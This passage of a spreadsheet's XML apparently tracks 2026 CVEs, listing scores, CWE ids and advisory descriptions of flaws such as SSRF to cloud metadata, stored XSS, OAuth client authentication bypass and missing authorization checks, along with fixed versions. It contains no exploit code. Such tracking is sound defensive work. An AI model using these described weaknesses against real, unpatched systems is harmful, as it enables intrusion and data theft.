      <c r="I4201" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J4201" s="5" t="inlineStr"/>
      <c r="K4201" s="5" t="inlineStr">
        <is>
          <t>CWE-348</t>
        </is>
      </c>
      <c r="L4201" s="5" t="inlineStr">
        <is>
          <t>Ghost CLI before 1.30.1 contains an IP spoofing vulnerability that allows unauthenticated remote attackers to bypass rate-limiting controls by manipulating the X-Forwarded-For header through a misconfigured Nginx configuration. Attackers can append attacker-controlled values to the header chain using the $proxy_add_x_forwarded_for directive to present an arbitrary IP address, circumventing Ghost's rate-limiting mechanisms on self-hosted instances.</t>
        </is>
      </c>
      <c r="M4201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25552</t>
        </is>
      </c>
    </row>
    <row r="4202">
      <c r="A4202" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39828</t>
        </is>
      </c>
      <c r="C4202" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4202" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4202" s="5" t="inlineStr"/>
      <c r="F4202" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4202" s="5" t="inlineStr"/>
      <c r="H4202" s="5" t="inlineStr">
        <is>
          <t>golang:crypto</t>
        </is>
      </c>
      <c r="I4202" s="5" t="inlineStr">
        <is>
          <t>2026-05-22</t>
        </is>
      </c>
      <c r="J4202" s="5" t="inlineStr"/>
      <c r="K4202" s="5" t="inlineStr">
        <is>
          <t>CWE-281, CWE-295</t>
        </is>
      </c>
      <c r="L4202" s="5" t="inlineStr">
        <is>
          <t>When an SSH server authentication callback returned PartialSuccessError with non-nil Permissions, those permissions were silently discarded, potentially dropping certificate restrictions such as force-command after a second factor succeeded. Returning non-nil Permissions with PartialSuccessError now results in a connection error.</t>
        </is>
      </c>
      <c r="M4202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39828</t>
        </is>
      </c>
    </row>
    <row r="4203">
      <c r="A4203" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43980</t>
        </is>
      </c>
      <c r="C4203" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4203" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4203" s="5" t="inlineStr"/>
      <c r="F4203" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4203" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4203" s="5" t="inlineStr"/>
      <c r="I4203" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J4203" s="5" t="inlineStr"/>
      <c r="K4203" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4203" s="5" t="inlineStr">
        <is>
          <t>Malla is a web analyzer for Meshtastic networks based on MQTT data. Prior to commit 4086e2b5f61615a813b70b25bc76095083552135, code names (long_name, short_name) received via MQTT are stored in SQLite without sanitization and rendered into the DOM without escaping. Any participant on a public Meshtastic MQTT broker can set a malicious node name that executes JavaScript in the browser of every Malla dashboard visitor. Commit 4086e2b5f61615a813b70b25bc76095083552135 fixes the issue.</t>
        </is>
      </c>
      <c r="M4203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43980</t>
        </is>
      </c>
    </row>
    <row r="4204">
      <c r="A4204" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44476</t>
        </is>
      </c>
      <c r="C4204" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4204" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4204" s="5" t="inlineStr"/>
      <c r="F4204" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4204" s="5" t="inlineStr"/>
      <c r="H4204" s="5" t="inlineStr"/>
      <c r="I4204" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4204" s="5" t="inlineStr"/>
      <c r="K4204" s="5" t="inlineStr">
        <is>
          <t>CWE-1390, CWE-287</t>
        </is>
      </c>
      <c r="L4204" s="5" t="inlineStr">
        <is>
          <t>Doorkeeper is an OAuth 2 provider for Ruby on Rails. In version 1.9.0, an attacker who knows only a dynamically registered client's client_id, which is public information, can authenticate as that client at the token endpoint and obtain an access token without providing its client_secret. This occurs because the Dynamic Client Registration feature creates applications with confidential: false hard-coded, even though the registration response returns a client_secret and advertises support for the client_secret_basic and client_secret_post authentication methods; since Doorkeeper treats a blank or missing secret as valid for non-confidential (public) clients, the secret is never verified. Only projects that have explicitly enabled Dynamic Client Registration, which is disabled by default, are affected. This issue is fixed in version 1.10.0.</t>
        </is>
      </c>
      <c r="M4204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44476</t>
        </is>
      </c>
    </row>
    <row r="4205">
      <c r="A4205" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47721</t>
        </is>
      </c>
      <c r="C4205" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4205" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4205" s="5" t="inlineStr"/>
      <c r="F4205" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4205" s="5" t="inlineStr"/>
      <c r="H4205" s="5" t="inlineStr"/>
      <c r="I4205" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J4205" s="5" t="inlineStr"/>
      <c r="K4205" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4205" s="5" t="inlineStr">
        <is>
          <t>FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. Prior to 1.3.2, POST /api/scheduler and DELETE /api/scheduler in server/api/scheduler/index.js do not consistently enforce authJwt.haveAdminPermission for scheduler settings. An authenticated non-admin operator can create or alter deviceActions that invoke onSetValue or onRunScript, or delete schedules, gaining access to device-value changes and server-side project script execution normally reserved for administrators. Scheduled and repeating actions can continue changing PLC setpoints, safety interlocks, device state, or project data after the operator's session ends. This issue is fixed in version 1.3.2.</t>
        </is>
      </c>
      <c r="M4205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47721</t>
        </is>
      </c>
    </row>
    <row r="4206">
      <c r="A4206" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48115</t>
        </is>
      </c>
      <c r="C4206" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4206" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4206" s="5" t="inlineStr"/>
      <c r="F4206" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4206" s="5" t="inlineStr"/>
      <c r="H4206" s="5" t="inlineStr"/>
      <c r="I4206" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J4206" s="5" t="inlineStr"/>
      <c r="K4206" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L4206" s="5" t="inlineStr">
        <is>
          <t>Misskey is an open source, federated social media platform. All Misskey servers running versions 2024.5.0 and later, but prior to 2026.5.4, contain a vulnerability in the Server Announcements API where insufficient permission checks allow attackers to access limited portions of data that they normally couldn't view. This vulnerability occurs whether or not federation is enabled. This issue has been fixed in version 2026.5.4.</t>
        </is>
      </c>
      <c r="M4206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48115</t>
        </is>
      </c>
    </row>
    <row r="4207">
      <c r="A4207" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50544</t>
        </is>
      </c>
      <c r="C4207" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4207" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4207" s="5" t="inlineStr"/>
      <c r="F4207" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4207" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4207" s="5" t="inlineStr"/>
      <c r="I4207" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J4207" s="5" t="inlineStr"/>
      <c r="K4207" s="5" t="inlineStr">
        <is>
          <t>CWE-379, CWE-732</t>
        </is>
      </c>
      <c r="L4207" s="5" t="inlineStr">
        <is>
          <t>NortheBridge/luminalshine is a Sunshine-compatible game stream host for Moonlight. Prior to version 26.05.0-rc4, a latent gap exists on a default install, the file at `src/platform/windows/misc.cpp` lives at `C:\ProgramData\LuminalShine\config\apps.json` and is created by the `SYSTEM` service. Under Windows' default `C:\ProgramData` inheritance, that gives `BUILTIN\Users` only Read+Execute — not writable — so the canonical EoP doesn't actually trigger on a vanilla install. Version 26.05.0-rc4 contains a patch for the issue. As a workaround, use default condition DACLs for `ProgramData`.</t>
        </is>
      </c>
      <c r="M4207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50544</t>
        </is>
      </c>
    </row>
    <row r="4208">
      <c r="A4208" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53600</t>
        </is>
      </c>
      <c r="C4208" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4208" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4208" s="5" t="inlineStr"/>
      <c r="F4208" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4208" s="5" t="inlineStr"/>
      <c r="H4208" s="5" t="inlineStr"/>
      <c r="I4208" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J4208" s="5" t="inlineStr"/>
      <c r="K4208" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-843</t>
        </is>
      </c>
      <c r="L4208" s="5" t="inlineStr">
        <is>
          <t>async-tar is a tar archive reading/writing library for async Rust. Prior to version 0.6.1, async-tar mis-applies a buffered PAX size extension to an intermediary extension header (a GNU longname L, a GNU longlink K, or a PAX x/g header) instead of to the next file entry. POSIX requires a PAX extended-header record set to describe the next file entry, never an intervening extension header. Because poll_next_raw (src/archive.rs) threads the buffered PAX records into the size computation of whatever raw header it reads next — and that header can be an intermediary L — the stream cursor is advanced by an attacker-chosen amount when the L body is consumed. The parser then desyncs relative to a POSIX-correct tar parser (e.g. GNU tar), reading subsequent bytes at the wrong block boundary. This issue has been patched in version 0.6.1.</t>
        </is>
      </c>
      <c r="M4208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53600</t>
        </is>
      </c>
    </row>
    <row r="4209">
      <c r="A4209" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53639</t>
        </is>
      </c>
      <c r="C4209" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4209" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4209" s="5" t="inlineStr"/>
      <c r="F4209" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4209" s="5" t="inlineStr"/>
      <c r="H4209" s="5" t="inlineStr"/>
      <c r="I4209" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4209" s="5" t="inlineStr"/>
      <c r="K4209" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L4209" s="5" t="inlineStr">
        <is>
          <t>Sylius is an Open Source eCommerce Framework on Symfony. Starting in version 2.0.0 and prior to version 2.0.18, 2.1.15, and 2.2.6, the `GET /api/v2/shop/payment-requests/{hash}` and `PUT /api/v2/shop/payment-requests/{hash}` endpoints look up the payment request solely by the hash from the URL. No ownership check is performed against the authenticated customer or the underlying order. An attacker who obtains a payment request hash can read the payment request and, through the `payment` IRI in the response, recover the underlying order's `tokenValue` (which itself grants access to the full order, items, addresses, customer email, totals); and/or update the payment request payload (e.g. `target_path`, `after_path`). These fields are used by the front-end controller to redirect the user after the payment, so an attacker can flip them to an attacker-controlled URL and intercept the buyer. The hash is a UUID, so it has to be obtained out-of-band (logs, shared links, referrer headers, a co-located client), but once it is known no other credential is required, neither authentication nor knowledge of the order token. The creation endpoint `POST /api/v2/shop/orders/{tokenValue}/payment-requests` shares the same flaw: it resolves the target order solely from the `tokenValue` in the URL without verifying that the caller owns the order. The issue is fixed in versions 2.0.18, 2.1.15, and 2.2.6. As a workaround, add a query extension that filters the `GET` operation; decorate the `PUT` state provider, guard the `POST` creation endpoint with a command-bus middleware, and wire the services.</t>
        </is>
      </c>
      <c r="M4209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53639</t>
        </is>
      </c>
    </row>
    <row r="4210">
      <c r="A4210" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54020</t>
        </is>
      </c>
      <c r="C4210" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4210" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4210" s="5" t="inlineStr"/>
      <c r="F4210" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4210" s="5" t="inlineStr"/>
      <c r="H4210" s="5" t="inlineStr"/>
      <c r="I4210" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J4210" s="5" t="inlineStr"/>
      <c r="K4210" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="L4210" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. Prior to 0.11.0, Open WebUI resolved a hostname during URL validation and rejected private, loopback, and link-local addresses, but the HTTP clients resolved the hostname again at connection time. An authenticated attacker who controlled authoritative DNS for a submitted hostname could answer with a public address during validation and an internal one during connection, reaching cloud metadata, loopback admin APIs, or internal services through URL ingest, chat image_url fetches, image editing, or OAuth profile-picture fetches, with most paths returning the response to the attacker and the OAuth path forwarding the OAuth access token. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M4210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54020</t>
        </is>
      </c>
    </row>
    <row r="4211">
      <c r="A4211" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55162</t>
        </is>
      </c>
      <c r="C4211" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4211" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4211" s="5" t="inlineStr"/>
      <c r="F4211" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4211" s="5" t="inlineStr"/>
      <c r="H4211" s="5" t="inlineStr"/>
      <c r="I4211" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J4211" s="5" t="inlineStr"/>
      <c r="K4211" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4211" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.2, lemur/certificates/verify.py accepted CRL Distribution Point and OCSP responder URLs from uploaded certificate extensions and used them in crl_verify and ocsp_verify without adequate destination validation. An authenticated operator could submit a certificate through POST /api/1/certificates/upload and cause verify_string to reach loopback, RFC1918, link-local, or instance-metadata destinations such as 169.254.169.254. The requests could probe internal services and create side effects from the Lemur host network position. The CRL path also used an unbounded cache, allowing attacker-controlled entries to persist and consume memory. The fix validates destinations, supports explicit trusted-host allowlists, and bounds the CRL cache. This issue is fixed in version 1.9.2.</t>
        </is>
      </c>
      <c r="M4211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55162</t>
        </is>
      </c>
    </row>
    <row r="4212">
      <c r="A4212" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55163</t>
        </is>
      </c>
      <c r="C4212" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4212" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4212" s="5" t="inlineStr"/>
      <c r="F4212" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4212" s="5" t="inlineStr"/>
      <c r="H4212" s="5" t="inlineStr"/>
      <c r="I4212" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J4212" s="5" t="inlineStr"/>
      <c r="K4212" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4212" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.2, PUT /api/1/roles/ in lemur/roles/views.py:298 authorized updates with RoleMemberPermission(role_id), which allowed either an administrator or any existing member of the target role. The handler passed data["users"] and data["name"] to service.update, allowing a non-admin member to add or remove other users and rename the role. This enabled lateral privilege grants within roles that control certificate and authority access and could deny access by removing legitimate members. The DELETE handler already required admin_permission, confirming that the weaker PUT authorization was inconsistent. The fix applies the same administrator-only requirement to the PUT handler. This issue is fixed in version 1.9.2.</t>
        </is>
      </c>
      <c r="M4212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55163</t>
        </is>
      </c>
    </row>
    <row r="4213">
      <c r="A4213" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55482</t>
        </is>
      </c>
      <c r="C4213" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4213" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4213" s="5" t="inlineStr"/>
      <c r="F4213" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4213" s="5" t="inlineStr"/>
      <c r="H4213" s="5" t="inlineStr"/>
      <c r="I4213" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J4213" s="5" t="inlineStr"/>
      <c r="K4213" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L4213" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an IT asset/license management system. Prior to 8.4.1, a non-superadmin can use app/Http/Controllers/Assets/BulkAssetsController.php update() to submit company_id directly without Company::getIdForCurrentUser(), allowing assets to be moved across company boundaries and breaking multi-tenant isolation. This issue is fixed in version 8.4.1.</t>
        </is>
      </c>
      <c r="M4213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55482</t>
        </is>
      </c>
    </row>
    <row r="4214">
      <c r="A4214" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5588</t>
        </is>
      </c>
      <c r="C4214" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4214" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4214" s="5" t="inlineStr"/>
      <c r="F4214" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G4214" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4214" s="5" t="inlineStr"/>
      <c r="I4214" s="5" t="inlineStr">
        <is>
          <t>2026-04-15</t>
        </is>
      </c>
      <c r="J4214" s="5" t="inlineStr"/>
      <c r="K4214" s="5" t="inlineStr">
        <is>
          <t>CWE-327, CWE-347</t>
        </is>
      </c>
      <c r="L4214" s="5" t="inlineStr">
        <is>
          <t>Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcpkix on all (pkix modules), Legion of the Bouncy Castle Inc. BCPKIX-FIPS bcpkix on All (pkix modules), Legion of the Bouncy Castle Inc. BCPIX-LTS bcpkix on All (pkix modules).
 This vulnerability is associated with program files JcaContentVerifierProviderBuilder.Java, JcaContentVerfierProviderBuilder.Java.
This issue affects BC-JAVA: from 1.67 before 1.80.2, from 1.81 before 1.81.1, from 1.82 before 1.84; BCPKIX-FIPS: from 2.0.6 before 2.0.11, from 2.1.7 before 2.1.11; BCPIX-LTS: from 2.73.7 before 2.73.11.</t>
        </is>
      </c>
      <c r="M4214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5588</t>
        </is>
      </c>
    </row>
    <row r="4215">
      <c r="A4215" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57165</t>
        </is>
      </c>
      <c r="C4215" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4215" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4215" s="5" t="inlineStr"/>
      <c r="F4215" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4215" s="5" t="inlineStr"/>
      <c r="H4215" s="5" t="inlineStr"/>
      <c r="I4215" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4215" s="5" t="inlineStr"/>
      <c r="K4215" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L4215" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit 628b716, a stack buffer overflow exists in the PJLIB-UTIL telnet CLI front-end when redrawing the command line during history recall (handle_up_down() in cli_telnet.c). This affects only applications that enable the telnet CLI front-end (same gating as the related CLI issue). The line-redraw sequence for a recalled history entry can accumulate more data than a fixed-size stack buffer holds, which may lead to application termination. Exploitation requires access to the unauthenticated telnet CLI, which already permits arbitrary CLI commands, so the additional impact is limited. Applications that do not enable the telnet CLI front-end are not affected. This issue has been patched via commit 628b716.</t>
        </is>
      </c>
      <c r="M4215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57165</t>
        </is>
      </c>
    </row>
    <row r="4216">
      <c r="A4216" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57166</t>
        </is>
      </c>
      <c r="C4216" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4216" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4216" s="5" t="inlineStr"/>
      <c r="F4216" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4216" s="5" t="inlineStr"/>
      <c r="H4216" s="5" t="inlineStr"/>
      <c r="I4216" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4216" s="5" t="inlineStr"/>
      <c r="K4216" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L4216" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit 4472a31, a stack buffer overflow exists in the PJLIB-UTIL telnet CLI front-end when rendering feedback for an entered command line. Several command-line handling paths write an attacker-influenced amount of data into fixed-size buffers without sufficient bounds checking, so a long command line can overflow them. This affects only applications that enable the telnet CLI front-end (e.g. pj_cli_telnet_create() / --cli-telnet-port). The telnet CLI is an interactive administration interface with no authentication, so any client able to reach it can already issue arbitrary CLI commands. A malformed or overly long command line can overflow a fixed-size stack buffer while rendering command-line feedback, which may lead to application termination. Because reaching this code already requires access to the unauthenticated CLI, the impact beyond that existing access is limited. Applications that do not enable the telnet CLI front-end are not affected. This issue has been patched via commit 4472a31.</t>
        </is>
      </c>
      <c r="M4216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57166</t>
        </is>
      </c>
    </row>
    <row r="4217">
      <c r="A4217" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61807</t>
        </is>
      </c>
      <c r="C4217" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4217" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4217" s="5" t="inlineStr"/>
      <c r="F4217" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4217" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4217" s="5" t="inlineStr"/>
      <c r="I4217" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J4217" s="5" t="inlineStr"/>
      <c r="K4217" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4217" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an IT asset/license management system. Prior to 8.6.2, a stored manufacturer or supplier name passed as the table component $name becomes data-selected-count-id in resources/views/partials/bootstrap-table.blade.php. Client-side code reads the browser-decoded countId, uses it as a selector, concatenates countId.substring(1) into an HTML string, and passes the string to jQuery .after(). A crafted name can therefore execute JavaScript when an authenticated user views the manufacturer detail page or supplier detail page, potentially exposing data or actions available to that session. This issue is fixed in version 8.6.2.</t>
        </is>
      </c>
      <c r="M4217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61807</t>
        </is>
      </c>
    </row>
    <row r="4218">
      <c r="A4218" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6217</t>
        </is>
      </c>
      <c r="C4218" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4218" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4218" s="5" t="inlineStr"/>
      <c r="F4218" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4218" s="5" t="inlineStr"/>
      <c r="H4218" s="5" t="inlineStr"/>
      <c r="I4218" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4218" s="5" t="inlineStr"/>
      <c r="K4218" s="5" t="inlineStr">
        <is>
          <t>CWE-759</t>
        </is>
      </c>
      <c r="L4218" s="5" t="inlineStr">
        <is>
          <t>Use of a One-Way hash without a salt vulnerability in Pik Online Software Solutions Inc. Pik Online Portal allows Cryptanalysis.
This issue affects Pik Online Portal: through 3.5.1.</t>
        </is>
      </c>
      <c r="M4218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6217</t>
        </is>
      </c>
    </row>
    <row r="4219">
      <c r="A4219" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62323</t>
        </is>
      </c>
      <c r="C4219" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4219" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4219" s="5" t="inlineStr"/>
      <c r="F4219" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4219" s="5" t="inlineStr"/>
      <c r="H4219" s="5" t="inlineStr"/>
      <c r="I4219" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J4219" s="5" t="inlineStr"/>
      <c r="K4219" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4219" s="5" t="inlineStr">
        <is>
          <t>Cloudreve is a self-hosted file management and sharing system. Prior to 4.17.0, ViewerSessionValidation uses only the session-id prefix of a WOPI access token and does not enforce the requested viewer action, allowing a malicious or compromised WOPI viewer with a view session to forge the token suffix and invoke WOPI write routes for the underlying file. This issue is fixed in version 4.17.0.</t>
        </is>
      </c>
      <c r="M4219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62323</t>
        </is>
      </c>
    </row>
    <row r="4220">
      <c r="A4220" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4220" s="5" t="inlineStr">
        <is>
